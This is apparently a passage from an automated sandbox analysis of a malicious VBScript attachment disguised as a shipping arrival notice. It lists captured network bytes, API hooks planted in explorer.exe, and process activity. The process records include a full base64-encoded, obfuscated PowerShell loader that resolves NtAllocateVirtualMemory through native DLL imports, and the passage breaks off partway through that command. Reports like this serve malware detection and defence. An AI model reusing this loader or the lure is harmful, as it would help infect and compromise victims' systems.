                                                                                                              2022-08-22 18:02:06 UTC86INData Raw: 7c 15 35 36 b6 bd 69 ec d7 9a c9 cf f7 ac 64 82 ae 31 3d 6d d2 eb 66 78 e4 6d d5 d0 30 b5 11 d5 6f 2b 58 4a bc 96 a4 e7 8f e9 b9 11 b2 ab 31 bd 7a 4f 86 39 f4 d7 6f 2b ec 9e 94 b8 fb ac 95 b9 c3 05 a9 36 e5 47 d2 8e df 49 1e 83 7a 1d 4b 9f 98 ce 1d 6a 1b d5 5e a2 31 21 dc 24 2b 60 b1 1f 97 84 f1 ef ba f8 5c 77 7f 53 7b c6 38 99 9f f9 5e 13 d0 34 74 e1 c7 9f 7a ae c9 79 dc b7 45 af 80 9d d4 06 e1 e6 94 ea d6 9b 25 4b 65 e1 4a 18 81 e0 24 f2 e8 04 09 2e 07 50 82 df 17 a5 b4 9c f5 53 8f de 4e 6a 05 22 cd a5 b0 87 65 42 9c a2 6e a5 a8 c8 fd 29 71 c4 d7 bc 4b 22 86 3b c8 14 ec 38 dc 78 e3 a7 6b 1d 43 e6 50 d5 4d 68 86 c0 68 5d c4 b6 b3 d0 51 fc 9d 7e 10 dd c7 ee 10 de e1 5f 40 2b c1 46 d2 35 4f 3d 6f f0 5e a0 47 0c ed e7 d8 ab 35 03 75 dd a5 bc 1c b0 cb 59 70
                                                                                                              Data Ascii: |56id1=mfxm0o+XJ1zO9o+6GIzKj^1!$+`\wS{8^4tzyE%KeJ$.PSNj"eBn)qK";8xkCPMhh]Q~_@+F5O=o^G5uYp
                                                                                                              2022-08-22 18:02:06 UTC94INData Raw: a0 86 41 d0 68 d3 19 bf 62 b6 a9 b3 ca d8 55 1e 29 48 d5 e9 a5 d2 59 c0 be de 57 ce eb db 30 8e e7 ae 98 73 bb cb ee 0a 4d 60 2d 3a 94 f5 ac 5f 2f 7b 50 f1 da 95 00 14 c1 d2 dd 36 3b be a0 06 f8 9c 7f fd 72 bd a0 14 40 91 7f 4c 16 ce 1d c7 e0 c7 88 76 d2 d6 9e 80 25 5d f8 cc 27 c5 98 8e 28 42 4f f8 22 08 c4 0c 33 36 39 98 eb 14 f3 06 48 06 8f e1 4a 5e 56 ff 39 e9 fb 2f e7 01 d2 3f cf 8b 61 36 a1 13 ba 43 98 99 26 29 d2 9b 80 ed e7 4c ce f6 aa 6e e8 45 75 e1 5b 7b 07 98 54 46 e5 56 f4 2c 03 da f1 d0 d0 14 4b 13 c0 75 da 9a d0 13 60 c3 63 d8 17 fd e4 d8 86 34 f2 d8 d4 e3 6a 99 06 cb 36 f3 ea 16 4a 20 aa 25 bb 63 de d1 40 16 90 3a 77 0b 2a 49 2b 4a 9c b5 82 2c bb 16 a0 0f d4 dc 23 e6 87 ea 11 08 3e e7 56 28 f2 97 d0 ac f7 f6 ae 56 49 85 ad 8a b0 c9 bc 4d d6
                                                                                                              Data Ascii: AhbU)HYW0sM`-:_/{P6;r@Lv%]'(BO"369HJ^V9/?a6C&)LnEu[{TFV,Ku`c4j6J %c@:w*I+J,#>V(VIM
                                                                                                              2022-08-22 18:02:06 UTC101INData Raw: 6a 58 f5 d5 62 2d 1b de c7 52 9a ac 3d a7 58 69 3b c3 55 8f 34 be b2 a8 27 d3 b2 8c e2 15 b8 d7 0a a2 7d d4 06 88 71 6a 13 c8 69 75 14 b1 f4 e3 c0 0f 47 3d f7 49 c9 70 02 9d 99 86 bf 66 7e 17 de 8f 03 d0 95 71 f9 e8 ef 24 2b 14 f8 21 5b 74 ee 47 bd 89 fb 66 61 8e 1f 91 61 6d 1a db a0 a9 db 20 04 83 bd 94 d6 b2 f8 d0 70 10 bf 95 d3 3e 4f ea 1e d1 96 c1 24 9f 18 22 d5 96 93 38 39 52 09 ed 64 1e 93 51 e8 99 c9 bd d7 15 6a 26 be 0c 46 c4 38 ba 5c 70 8b 4e fd 00 3c 01 7b d5 ef 90 99 a2 28 13 0a 09 fd 98 cc fd 65 fa d9 ac f1 06 2e 2d 2f ae bc c9 4f 56 d2 80 9c 85 80 1a 12 a0 4a 73 ff d0 3a 54 8f f0 84 30 05 fa e1 7f 66 75 2b 53 a3 91 2c b9 f6 70 db 63 1d 68 7a e9 b1 fd 37 ca 97 50 68 67 c2 c8 49 5b 12 30 9a 8d c9 3a 18 15 99 f1 55 3b fb f2 a8 24 d3 32 1b 47 9a
                                                                                                              Data Ascii: jXb-R=Xi;U4'}qjiuG=Ipf~q$+![tGfaam p>O$"89RdQj&F8\pN<{(e.-/OVJs:T0fu+S,pchz7PhgI[0:U;$2G
                                                                                                              2022-08-22 18:02:06 UTC109INData Raw: ff 0a a7 3c b6 6e d1 3e 90 33 6d 30 33 03 b9 2e e3 df 29 a9 21 83 4c 40 31 68 a5 b1 34 fa 55 d1 28 28 2c 41 70 48 57 95 0b 20 ae 8b e7 85 b8 33 a1 b8 73 de 45 c3 b2 29 8e 59 1e c8 3d f5 91 93 44 38 f5 da 34 69 cd 8a e4 71 ca 50 26 29 3f d9 4b c2 bf e7 91 15 cb 8f a3 a3 0d 19 31 ec 77 ed b8 ac 86 40 4f 31 cf 6d f3 dd 57 04 b5 e1 b6 99 7f cc 2f d5 dc 73 30 ea 65 53 57 1f 4a 18 36 17 59 06 71 aa c4 62 d0 a7 44 b4 27 80 f9 a1 00 5a fd d4 72 93 14 cf a4 bc c0 2f 79 b4 95 a3 4b 0f 47 be db 9f fb 4f 88 f8 29 e7 0f a6 c6 62 36 d0 d8 c0 7c 05 e3 df 10 f8 e4 a2 03 7f d0 91 5b 46 7b 40 ed 72 f9 77 1f 42 42 81 91 9e 44 96 21 d7 ab b8 6b 43 a1 cb ab 53 b4 18 d2 f3 10 c4 33 a3 bc 3c 55 f2 e4 a8 e4 20 b6 e2 a5 2b aa 39 49 ba 85 9b 26 51 e8 14 a4 a2 9e 15 6a cf 7a 1c ea
                                                                                                              Data Ascii: <n>3m03.)!L@1h4U((,ApHW 3sE)Y=D84iqP&)?K1w@O1mW/s0eSWJ6YqbD'Zr/yKGO)b6|[F{@rwBBD!kCS3<U +9I&Qjz
                                                                                                              2022-08-22 18:02:06 UTC117INData Raw: be 7a ae 96 9c 21 5a e1 ba 71 a5 36 89 57 93 ce ca c1 92 81 60 04 25 fe e5 57 00 f0 11 c8 2a 90 71 18 97 f9 20 78 84 af 9a c1 64 79 d9 7b d5 da af e6 4d 17 61 59 d1 27 c3 fc 04 05 d5 12 32 11 00 2b 69 33 1c 4b 15 dc e3 67 bf 2d 59 2a 9f 01 c6 a6 0f d7 64 15 d8 83 31 a6 fe de eb 9d c8 96 02 17 fb f6 68 67 4c 00 4c 32 12 0d 54 a2 63 13 ba 47 9d 1f a6 fa f0 63 85 31 fb 05 cd ed 2b 52 0d 0d 29 3a 40 08 d4 04 c8 4e 40 db d6 f7 f3 a1 5c 7e a9 e9 c8 93 a3 ef 7a 1d 0b eb 23 f7 a5 b8 73 d2 02 27 c7 b6 95 3f ac 4a 45 d0 91 0a 64 07 54 d2 15 30 6f 59 21 ad 91 cd 3d 5c 3a 91 3e cc 73 74 21 67 11 9e 0c 43 07 b1 1d be ab cd 3d a4 0f 04 6b b2 04 19 5e 8c 22 cb d4 11 b6 95 57 5d eb 69 3f 26 47 ae 41 4f de d0 2b f4 36 13 71 8b bd 12 6b 03 53 68 15 40 2b 3b a9 98 6b 5e e5
                                                                                                              Data Ascii: z!Zq6W`%W*q xdy{MaY'2+i3Kg-Y*d1hgLL2TcGc1+R):@N@\~z#s'?JEdT0oY!=\:>st!gC=k^"W]i?&GAO+6qkSh@+;k^
                                                                                                              2022-08-22 18:02:06 UTC125INData Raw: 17 77 da c7 76 56 e8 c9 cd ca 53 6f e0 86 7a 51 05 31 fb 1d 82 6d 87 1c b5 f2 1c 60 8d 4f f4 1c 8c 2a c4 94 ab 50 58 6a 47 b1 f7 52 2b 16 4a e5 91 c3 3f 0e e2 97 f8 ca f1 93 4d 4e a7 30 03 cc d1 2d d9 b0 37 37 bc 39 0f fa 9b f0 bf 82 1c 64 d0 38 66 36 81 06 e4 07 50 63 5b 11 05 4a ba af 79 64 8d 2f 1e 4e 8c cf 90 8d 64 f5 c2 fb 70 38 e8 14 66 34 5c 47 e8 c9 a3 88 3e d8 56 5f de 23 16 1c e7 48 4d 4b f6 a4 b3 79 1b ef f9 5e 7a d5 5b c5 d4 a7 74 e4 3d 76 2a be 43 7e 17 2d 32 18 63 cb f2 6a bd 14 34 cc 29 01 e0 90 a9 66 3a 18 a3 f0 49 6f f7 31 bd 38 2d 4c 51 e9 b6 75 0d 1c d7 e2 6a a1 8f 62 d5 dd e0 77 4b a5 2a 79 b6 0a ee a9 90 4b 49 17 7f 7a 8d 85 2c 8d 62 60 58 dc 7a 14 a1 08 6d f4 3e 4b 65 6b dc 8e 25 ec 80 e5 4c 9a ce a8 4c 66 c8 1d 32 3a c6 f5 c2 9a a6
                                                                                                              Data Ascii: wvVSozQ1m`O*PXjGR+J?MN0-779d8f6Pc[Jyd/Ndp8f4\G>V_#HMKy^z[t=v*C~-2cj4)f:Io18-LQujbwK*yKIz,b`Xzm>Kek%LLf2:
                                                                                                              2022-08-22 18:02:06 UTC133INData Raw: fd dd e5 48 2e d1 67 c2 90 87 26 04 7a bc ba 37 09 74 63 f4 a5 73 b3 10 72 ff 4b cc 5f b8 2c ce 05 1b 40 28 1a d7 5b f2 c5 a1 8d 43 ba d9 a0 73 ee a3 53 83 48 f1 04 f2 b3 dd 83 dd 5d c7 64 af 58 81 9b 0b 6d 6d ef 01 a1 ee f5 1a a3 bd f1 ea 94 29 50 38 5f c4 00 89 49 27 a3 ad 49 d4 77 c6 bb a1 dd 03 aa de 4d d9 c7 80 ae 45 ed b2 9f d9 60 8a 90 df 4f 99 9d 67 21 82 b1 1f 10 20 c6 24 1c d2 ab b7 b0 86 2c 8c 83 e1 6c 26 bb ca 40 16 dd 8b 8d 0b 0c a3 ab e1 71 72 c7 cf db ab 1d 21 5b 73 74 fc 06 68 42 8f b5 0f 9b 97 4a 6c a5 bd ba 05 5c d6 d8 a4 64 ac 53 d9 33 f2 4b e5 6a 55 61 a2 b3 54 8a bd c3 7a 30 b7 7d ff 41 cf 82 4b e4 c3 92 43 26 4d f3 f7 2d cd 94 b2 5f d1 3b df 56 bc 2b a1 d4 0a fe b0 7e e5 7c fa d5 e9 c3 2f 37 2d 90 03 4b fa 87 55 24 d3 c7 cc 0d 98 8d
                                                                                                              Data Ascii: H.g&z7tcsrK_,@([CsSH]dXmm)P8_I'IwME`Og! $,l&@qr![sthBJl\dS3KjUaTz0}AKC&M-_;V+~|/7-KU$
                                                                                                              2022-08-22 18:02:06 UTC141INData Raw: f9 d7 f7 7a b5 cf ca f7 8a a9 6d d3 9f a8 03 fe 88 a0 01 6c a9 42 8c 75 ec 64 5b f7 79 c0 16 65 7c ca d5 e4 32 c4 42 2d 74 b5 6f 96 0f ab 84 4f 51 7f 54 6d 72 e5 57 51 36 1f 04 24 1f a8 b4 c3 df 68 9e a4 c5 ae 2d b0 e5 24 84 f2 41 66 e0 e7 4a 37 2e cb dc 7e 40 a8 90 51 e4 0f 47 65 02 dd a6 44 93 98 2a 65 44 b1 c2 4a 07 e3 46 d3 e7 3f b2 99 f1 06 40 e8 b3 40 4c 8a 2b 4f bc 20 fd 1a 5c a4 33 c2 7a 2b d8 71 67 26 d5 49 fc b3 6a 7c 0b 1a 26 84 79 21 dd 8e dd e6 d8 6d 6b 98 ac e8 41 d8 cf c1 80 bd 7f eb 99 1c 48 6c c7 c9 84 b3 d6 56 3c f4 8b 48 23 0a b6 15 81 bb 1e 2e 35 8e 9f 5e cf f7 66 19 f3 aa 2e 91 9b c4 9e 0a 65 72 43 71 88 17 24 ae af 4c 6a ce 56 34 f3 2a a9 b2 ac 8d 70 d7 1f 36 f7 04 a2 29 e3 e3 14 49 90 c0 8f 1c 1c 0d 53 35 7c 96 8b 6c 37 3c 1d 99 4b
                                                                                                              Data Ascii: zmlBud[ye|2B-toOQTmrWQ6$h-$AfJ7.~@QGeD*eDJF?@@L+O \3z+qg&Ij|&y!mkAHlV<H#.5^f.erCq$LjV4*p6)IS5|l7<K
                                                                                                              2022-08-22 18:02:06 UTC148INData Raw: 1b 2f 0d 89 e2 0d 0b 50 71 4b 88 05 5c de d4 3c ec 10 e5 81 3c f1 63 b7 f7 2a b0 2d ee 0f c9 19 36 b0 76 23 f4 68 b0 e3 d7 1e 8f d2 d9 13 ff 1b e7 31 b6 a2 0e 4f 06 20 03 d5 79 af 3e 99 60 f6 f2 c9 18 a3 3c be bc e3 b8 b8 40 7d a1 52 50 3a 97 da fa c3 6b 0c 5a b0 1a 56 f3 35 3c 89 ed 9a 19 78 0f 07 c8 be 1f 33 70 74 12 de 7d 5c 15 35 3a a4 d7 bc a9 de a0 0c 0b e0 c4 2a e0 22 69 61 17 a5 6a 3b c5 d5 3f ee bf b2 6a 7e 8e 4d af 09 b0 14 2b 89 dd 93 d6 05 8e 0d ad f4 a9 06 45 3a 86 2b 7e 15 d3 78 11 54 f0 89 61 1e d3 6c a9 05 ce c7 4e ad cd 78 46 c1 22 82 c5 5b 4d e1 a0 3e 1c 71 52 62 1a c1 df 50 48 0f 60 92 ee aa 4d 05 70 e1 86 42 c9 6d e7 c7 fa 13 93 4f d5 1f 75 ed 70 05 b3 00 7e 93 10 4c 1a 55 cf dd 1f 0e 73 3c a3 c4 57 0a 0f 4b ed 9f 16 f6 69 4a a4 d5 0b
                                                                                                              Data Ascii: /PqK\<<c*-6v#h1O y>`<@}RP:kZV5<x3pt}\5:*"iaj;?j~M+E:+~xTalNxF"[M>qRbPH`MpBmOup~LUs<WKiJ
                                                                                                              2022-08-22 18:02:06 UTC156INData Raw: 7f f0 bd a6 5f 49 61 2c f0 f8 dd 62 b9 ac 49 13 b7 a9 4c 51 6e 3b 30 64 8b dc 66 cf 1e 7f e0 50 6e 5a 96 29 ba a5 00 14 6d b3 3c 11 a6 1d ed 29 4a 85 f3 51 31 65 69 09 fc 48 8d 09 38 ff 8b f8 ff 66 2b 87 ac b5 b0 b7 e4 48 d5 3f 1d e4 1a 4a 52 d7 33 3b ca d4 73 84 97 47 12 14 b1 7a aa 0f 62 7d 20 9a db 5e 93 f2 be 4f ea ff 2a 09 4b eb 49 22 a7 b2 c3 0a 69 1a 36 33 60 3a c6 22 a2 21 b9 65 fa 3f 47 c5 36 02 c2 4e 9a 64 73 f3 4c e6 4b f8 af 6b 97 46 e6 ae 87 8d d6 cf 47 31 cf d2 ac 0e 62 87 2a d3 3f 6e 82 5d ea 44 b1 84 34 66 a1 b2 18 e6 3a 56 53 0b 39 e2 70 3c 9b ca 93 3f 03 3c f6 71 51 fa 7d 3b 9b 5e bc 93 57 eb 8a 5f 1f 70 df 0f 5f 1e a8 ba e0 da c7 f6 b6 98 cd 07 01 b5 66 58 05 c1 87 f9 58 c8 45 da 82 2b d2 ad 55 01 98 e5 e7 3e c3 3c 11 d3 bf b1 01 f4 af
                                                                                                              Data Ascii: _Ia,bILQn;0dfPnZ)m<)JQ1eiH8f+H?JR3;sGzb} ^O*KI"i63`:"!e?G6NdsLKkFG1b*?n]D4f:VS9p<?<qQ};^W_p_fXXE+U><
                                                                                                              2022-08-22 18:02:06 UTC164INData Raw: a5 3e 8b 3f df 80 1f d5 63 fe 83 2f 8c 2b 7c f8 26 2b 1b 69 51 d0 af 82 3a af b4 fa 70 51 80 12 63 f2 52 82 9e 1e 7e 8a bc 0b c0 44 69 89 d9 80 50 9f 24 ff af 5f f1 a3 77 0e 96 87 7c 52 fe f3 2a a9 84 ee 0c 04 85 46 12 d8 a4 4c 10 64 b0 f7 91 ef a7 40 de c9 ba 2a 05 30 ed f1 c0 a4 f7 b9 96 14 e1 74 51 eb a0 1c 5b a5 0a da 9f a2 95 cc 89 48 ac a0 c8 3e 34 35 60 ce de 08 17 ba 3b d0 de 89 26 25 61 cd 27 31 0a 6a 8f 67 e7 91 20 83 4b ad 3c 9c c6 10 2e e9 90 e5 41 73 40 37 89 95 67 ab 0c e2 cf fc 5d 5f 87 7d 10 f4 c4 b5 ed b4 ac bf 83 3e 90 8a c7 16 e8 82 8c 76 31 d3 78 a9 3b ff 5c a5 a5 90 75 39 22 de 9b 9a ae a4 01 06 b4 5f 22 9a b8 96 09 7d a0 3a 9d 51 37 61 a2 ba 0c 2b bb ea f7 ce 86 ca 25 14 49 9a 2b 7d 9f 68 6c f8 9f 1e 1a a6 d4 70 21 52 27 44 8a 0b 65
                                                                                                              Data Ascii: >?c/+|&+iQ:pQcR~DiP$_w|R*FLd@*0tQ[H>45`;&%a'1jg K<.As@7g]_}>v1x;\u9"_"}:Q7a+%I+}hlp!R'De
                                                                                                              2022-08-22 18:02:06 UTC172INData Raw: fa 74 80 1e 29 51 3c 93 c6 18 8d f7 83 c3 7b ce 5f 66 12 75 03 7e c2 03 a1 01 30 eb 4e 08 35 1f 58 e8 93 bb ed 49 32 bd 2a ad 6e cc 98 c7 07 83 e9 b0 e7 9a 41 7a f5 f0 ac a4 dd f0 62 fa 6e 5b a1 bb 16 36 d5 83 ce fb ca e6 73 0e 49 ef 64 fc 80 86 b6 85 ae 29 04 1d ec ef 50 f7 4d 2a 09 61 94 e9 81 1b ff 92 32 8e 41 78 08 52 5c 1b 08 bf 6e 01 52 f2 99 d5 58 cd 47 6c 01 4b f4 6f 74 e9 f8 8c 54 09 c6 80 ae c8 b9 35 30 c6 31 fd b9 f3 2b 9e 04 a9 db c0 81 99 e6 8e f1 70 4b ce 0e 86 1f 8e 7e 0c 7f a5 7b 8d 15 ef 1c 28 4e 76 fb fb 0d 9a 49 be be e0 44 9c cd a8 1a 37 6e 4f 3b 85 1d 4b 0f 1e b4 c5 5e fb 51 a9 2a d0 4f 7e d8 02 b7 6f e7 ad 6f 46 93 fb f2 93 28 e7 a8 c7 b4 4c 96 82 a0 ee 4e dd 04 4f f3 f5 cd 63 e1 52 cb a7 e9 94 a9 3e 70 00 7e 53 e0 46 a6 3d 6a 1c 82
                                                                                                              Data Ascii: t)Q<{_fu~0N5XI2*nAzbn[6sId)PM*a2AxR\nRXGlKotT501+pK~{(NvID7nO;K^Q*O~ooF(LNOcR>p~SF=j
                                                                                                              2022-08-22 18:02:06 UTC180INData Raw: fd bc df 89 9c b1 7e d7 f1 ba 8a 79 75 4e a1 81 5d fd a2 ee 14 48 c9 b5 2f b9 57 51 ec 7a fa 79 aa 65 ed f8 6e 09 d2 dc 99 df ea 51 48 3b 4d 81 e6 0a 0a ea 3a 47 fd d6 5d b1 dc ed 7c 45 df 3b 6c bc a8 f4 ba e3 3f 54 17 3d 2a e0 14 19 12 d0 cb 15 d0 58 db bd 26 0c 94 03 6e a2 a9 ef 8c cb 49 67 1c 1e 84 7d 7c b1 8d a1 57 d1 5b 95 ab 83 d7 df 1a 39 44 c7 c2 08 0f 8e d6 79 03 31 0b 69 e7 8b a3 e6 1a 2a 27 51 d1 da dc f9 7e 32 78 ad d2 4f 5d d1 5e 47 c6 2f b1 16 4b f4 2c 27 77 e4 9d b2 e3 13 5f 67 b0 fe 11 70 0a ab 9a 85 45 e1 b0 e5 f5 2b 99 34 dc 7c 98 91 c4 1f b5 4e bf 8f 10 14 a2 c6 5c 19 69 d0 0b e6 f3 e9 3b 52 69 b6 1f 3a f4 9d 8d ff 0a dc ba 06 84 42 40 3d e6 71 e1 0c b8 0e f0 11 cf 61 36 ed d6 71 70 91 e7 e9 04 c4 cc d8 5f f1 b6 96 53 b3 e1 d3 ab 4f c1
                                                                                                              Data Ascii: ~yuN]H/WQzyenQH;M:G]|E;l?T=*X&nIg}|W[9Dy1i*'Q~2xO]^G/K,'w_gpE+4|N\i;Ri:B@=qa6qp_SO


                                                                                                              Code Manipulations

                                                                                                              User Modules

                                                                                                              Hook Summary

                                                                                                              Function NameHook TypeActive in Processes
                                                                                                              PeekMessageAINLINEexplorer.exe
                                                                                                              PeekMessageWINLINEexplorer.exe
                                                                                                              GetMessageWINLINEexplorer.exe
                                                                                                              GetMessageAINLINEexplorer.exe

                                                                                                              Processes

                                                                                                              Process: explorer.exe, Module: user32.dll
                                                                                                              Function NameHook TypeNew Data
                                                                                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE9
                                                                                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE9
                                                                                                              GetMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xE9
                                                                                                              GetMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xE9

                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Target ID:1
                                                                                                              Start time:20:00:07
                                                                                                              Start date:22/08/2022
                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\NOA_CMACGM_Notice_of_Arrival_ONEGO_BORA_0JH0JR1MA_1661088550291R021206.vbs"
                                                                                                              Imagebase:0x7ff69bfc0000
                                                                                                              File size:170496 bytes
                                                                                                              MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate

                                                                                                              General

                                                                                                              Target ID:3
                                                                                                              Start time:20:00:50
                                                                                                              Start date:22/08/2022
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAdAB1AHIAZgBhAGcAZQBuACAAVAByAG8AcABoAG8AbgB1AGMAIABBAGMAaABvAG4AZAAgAEwAdQBmAHQAawB2AGEAbABpAHQAIABDAHkAYwBsACAAdABlAHQAYwBoAGUAZAB1AGQAIABQAGEAcgBhACAAUwB1AHAAcABsAGUAIABTAHUAYgB0AGkAdABsAGUAIABBAGMAYwBlAHMAcwAgAFAAYQByAGEAbAAgAE8AdgBlAHIAcABvAG4AIABnAHkAbgBlACAAUgBlAGQAZQBmAGkAbgBlACAATQBhAHQAZQByAGkAIABDAGgAYQBpAG4AbQBhAGsAaQBuACAAcwBwAGkAcgB1ACAATABlAHYAZQAgAHcAZQBmAHQAYQBnACAARgBvAHIAcwB5AG4AaQBuAGcAcwAgAEkAbgBkAHMAawB5AGQAbgBpAG4AIABUAHIAYQBuAG0AaQAgAFMAawByAGEAdgBlAHIAaQBuACAAVAB1AHIAbgAgAE0AYQBzAGsAaQBuACAAVABzAHQAcwBjAG8AIABBAHMAcwB1AG0AaQBuAGcAbAB5ACAATgBhAHQAdABlAHYAYQBuAGQAcgAgAFMAawBpAGwAIAANAAoAIwBBAGsAaQBuAGUAdABlAHQAZQAgAFUAbgBlAHgAcAAgAHAAaABvAHMAcABoAG8AcgAgAEYAbwByAGIAIABVAG4AYwBvAG4AdABpACAAUABsAGEAdAAgAEYAdQBuAGQAIABDAG8AbgBmAHUAYwBpAGEAbgAgAE0AZQBkAGEAbABqAGUAdgBpACAAUwBwAG8AcgBzAHQAIABEAGkAbwByAGEAbQBhAHMAawBuACAADQAKACMAQQBtAG4AaQAgAEwAbwB2AHIAZQB2AGkAcwBpAG8AIABoAGEAcgB0AGEAbAByAGUAZQAgAEsAbABiAHYAaQB0AHIAIABTAHQAZQBuAG8AYwBoAHIAIABTAGsAbwB2AHMAcAB1AHIAdgBlACAAQwBoAG8AbgBkAHIAbwAgAEgAdQBkAGcAZQBuACAAUAByAHUAdAB0AGUAbgByACAATQB5AHQAaABpAHMAZQAgAE8AbQBrAHIAcwAgAEEAcQB1AGkAYwB1AGwAdAAgAA0ACgAkAE0AYQBzAHQAZQByAE0AaQBuAGQAIAA9ACAAWwBjAGgAYQByAF0AMwA0ACAAKwAgACIATgAiACAAKwAgACIAdABBAGwAIgAgACsAIAAiAGwAbwBjACIAIAArACAAIgBhAHQAZQAiACsAIgBWAGkAIgAgACsAIAAiAHIAdAB1AGEAbAAiACAAKwAgACIATQBlAG0AbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKAA0ACgAjAEUAbgBnAHIAbwBvAHYAZQAgAG0AZQBnAGEAbAAgAE4AbwBuAGYAIABUAHUAbgBpAG4AZwBzACAAUwBqAGwAZQBnAGwAYQBkAGwAaQAgAFMAYQBuAGsAdAAgAFAAYQBtAHAAZQByACAAUAByAGUAZABpAHMAcABhACAARQBwAGgAZQAgAEEAcgBtAGEAIABEAGUAaABvAHIAbgBpAG4AIABHAG8AcwBzAGkAcAAgAEIAdQBzAHQAbABlAHIAcwAgAE8AYgBpAHMAcABhAG4AdAAgAE4AbwBuAHAAYQBjAGkAIABBAHAAcABsAGkAYwBlAHIAIABGAGkAZABvAHMAdABlAHIAIABMAGkAbgBqACAASABvAG0AaQBjAHUAbAAgAFQAdgBpAHYAbAByAGEAYQAgAEIAaQBkAHIAYQAgAHUAZwBlAG4AcABvAGwAcwB0ACAAUwBrAGUAbQBhAGYAbwByAG0AIABIAGEAbAB2AGEAYgBlAG4AcAAgAEwAeQBzAGkAIABhAGwAdABlAHIAYwBhACAAWQBhAGwAZQBsAGEAYQBzAGIAbAAgAEUAbgBkAG8AZwBzAGEAYQBmAG8AIABDAGEAbABjAGkAbwBmAGUAcgAgAEoAbwBiAGIAZQBzAGsAcgBpACAAVABvAHIAZQByAGUAZQByAHUAIABSAGUAdAB0ACAAUABlAHIAbAAgAA0ACgAjAFUAZABzAGsAIABLAGEAdABhAHMAdAByAG8AZgBlACAASAB5AHAAZQByAG0AIABTAGsAeQB0AHMAaAAgAEEAZgB0AGEAbAB0ACAASABhAHYAZQAgAEIAdQB0AHQAZQByAGQAZQBqAHMAIABGAHIAYgBhACAAQwBhAHQAbwBwAHQAIABJAGcAbgBvAHIAYQBuAGMAZQAgAE8AdQB0AGIAdQBsACAATQBlAGwAYgBvAHUAIABNAGkAcwB0AGkAIABTAG0AZABlACAAVQBuAGwAbwBkACAATwB2AGUAbgAgAFIAZQBvAGIAcwBlACAATwBwAGIAcgAgAEIAcgBkAGQAZQBnACAASAB5AGQAYQB0AGkAZABvAGMAZQAgAEQAZQBuAHQAaQBmAHIAaQBjAGUAIABBAGMAcgBvACAASQBuAGUAeABwACAAUwBlAGsAcwBrACAAVQBuAGQAZQAgAEgAeQBwAGUAIABHAGkAZgB0AGUAawBuAGkAIABPAG0AZABvAGUAYgAgAFMAawBhAGUAcgBtACAATgBpAG4AZQB0AGUAZAB1ACAARQBkAGkAdABlACAATwBtAGsAbwBzAHQAIABTAGwAZABlAHIAcwAgAA0ACgAjAEQAZQBnAGUAbgBlAHIAIABIAHkAcABlAHIAaABpAGQAIABBAGwAZgBnAHkAcABzACAAUgBpAGIAYQB6AHUAYgBhAGkAbgAgAEQAYQB5AGQAYQB3AG4AIABQAHIAYQBzACAAUwB1AGIAYwBvAG0AIABVAG4AcAByAG8AYgBpACAASQBuAGYAdQBzAGUAcgBzAGgAZQAgAFMAcABlAGMAdAByAGUAbABpACAAVgBlAGwAbAB5AGsAawBlAHQAIABpAG4AZgBhAG4AdAAgAFAAZQBqAGwAcwB0AG8AawBrACAARwBhAHUAcwBzAGYAaQBsAHQAIABBAHIAdABpAGYAIABTAGEAbABpAG4AZQAgAHYAYQBsAGYAYQAgAEYAaQBzAHQAIABQAGwAZQB1AHIAbwBzAHQAaQAgAGMAbABhAG4AcwB3AG8AbQBlACAASQBuAGgAYQBiAGkAbABlACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABEAGUAYwBhAHAAaQB0AGEAdAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFMAbABlAGUAcABFAHgAKABpAG4AdAAgAEIAcgBhAGQAeQBzAHAAMAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABHAGUAdABXAGkAbgBkAG8AdwBEAEMAKAApADsADQAKAA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACQATQBhAHMAdABlAHIATQBpAG4AZAApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABWAGkAdAByAG8AUwBvAGwAaQBkACgAaQBuAHQAIABEAGUAYwBhAHAAaQB0AGEAdAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAHkAbQBwAHQAbwBtAGkALABpAG4AdAAgAFMAcAByAG8AZwAsAHIAZQBmACAASQBuAHQAMwAyACAARABlAGMAYQBwAGkAdABhAH